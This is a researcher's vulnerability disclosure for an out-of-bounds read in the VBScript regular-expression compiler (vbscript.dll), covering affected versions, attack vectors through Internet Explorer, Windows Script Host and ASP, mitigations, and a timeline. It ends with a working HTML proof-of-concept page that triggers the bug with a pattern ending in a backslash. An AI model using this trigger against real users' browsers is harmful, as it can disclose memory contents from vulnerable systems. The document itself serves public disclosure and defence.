Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the sixth
entry in that series.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161108001.html. There you can find a repro
that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

VBScript RegExpComp::PnodeParse out-of-bounds read
==================================================
(The fix and CVE number for this bug are not known)

Synopsis
--------
A specially crafted script can cause the VBScript engine to read data
beyond a memory block for use as a regular expression. An attacker that
is able to run such a script in any application that embeds the VBScript
engine may be able to disclose information stored after this memory
block. This includes all versions of Microsoft Internet Explorer.

Known affected versions, attack vectors and mitigations
-------------------------------------------------------
* vbscript.dll
  The issue is known to have affected versions 5.8.7600.16385 up to
  5.8.9600.16384,   and both the 32- and 64-bit vbscript.dll binaries.
  It may also impact earlier versions as well as later versions as I am
  not sure exactly when the issue was addressed by Microsoft.

* Windows Script Host
  VBScript can be executed in the command line using  cscript.exe/
  wscript.exe. An attacker would need to find a script running on a
  target machine that accepts an attacker supplied regular expression
  and a string, or be able to execute his/her own script. However,
  since the later should already provide an attacker with arbitrary
  code execution, no additional privileges are gained by exploiting
  this vuln.

* Microsoft Internet Explorer
  VBScript can be executed from a web-page; MSIE 8, 9, 10 and 11 were
  tested and are all affected. MSIE 11 requires a META tag to force it
  to render the page as an earlier version, as MSIE 11 attempts to
  deprecate VBScript (but fails, so why bother?).
  An attacker would need to get a target user to open a specially
  crafted web-page. Disabling scripting, particularly VBScript, should
  prevent an attacker from triggering the vulnerable code path.
  Enabling *Enhanced Protected Mode* appears to disable VBScript on my
  systems, but I have been unable to find documentation on-line that
  confirms this is by design.

* Internet Information Server (IIS)
  If Active Server Pages (ASP) are enabled, VBScript can be executed in
  Active Server Pages. An attacker would need to find an asp page that
  accepts an attacker supplied regular expression and a string, or be
  able to inject VBScript into an ASP page in order to trigger the
  vulnerability.

Description
-----------
When a regular expression is used to find matches in a string, it is
first "compiled". During compilation, when a '\' escape character is
encountered, the RegExpComp::PnodeParse function reads the next
character to determine the type of escape sequence. However, if the last
character in a regular expression is a '\' character, the code will read
and use the terminating '\0' character as the second character in the
escape sequence. This causes the code to ignore the end of the string
and continue to compile whatever data is found beyond it as if it was
part of the regular expression.

Time-line
---------
* June 2014*: This vulnerability was found through fuzzing, but I was
  unable to reproduce it outside of my fuzzing framework for unknown
  reasons.
* April 2015: This vulnerability was found through fuzzing again.
* April 2015: This vulnerability was submitted to ZDI.
* May 2015: ZDI rejects the submission.
* November 2016: The issue does not reproduce in the latest build of
  MSIE 11.
* November 2016: Details of this issue are released.

Cheers,

SkyLined



Repro.html
<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="x-ua-compatible" content="IE=10">
    <script language="VBScript">
      Dim oARegAExp
      Set oARegAExp = New RegAExp
      Sub RegAExpASetAPattern(sAPattern)
        oARegAExp.Pattern = sAPattern
      End Sub
      Function RegAExpAExecute(sAData)
        RegAExpAExecute = oARegAExp.Execute(sAData)
      End Function
    </script>
    <script language="Javascript">
      // This PoAC attempts to exploit a memory disclosure bug in VBScript.dll
      // See http://blog.skylined.nl/20161108001.html for details.
      RegAExpASetAPattern("\u0504\u0706\u0908\u0B0A\u0D0C\u0F0E\u1110\u1312\u1514\u1716\u1918\u1B1A\\");
      var oAObject = RegAExpAExecute("23456789ABCD\0");
      // This work by SkyALined is licensed under a Creative Commons
      // Attribution-Non-Commercial 4.0 International License. 
    </script>
  </head>
</html>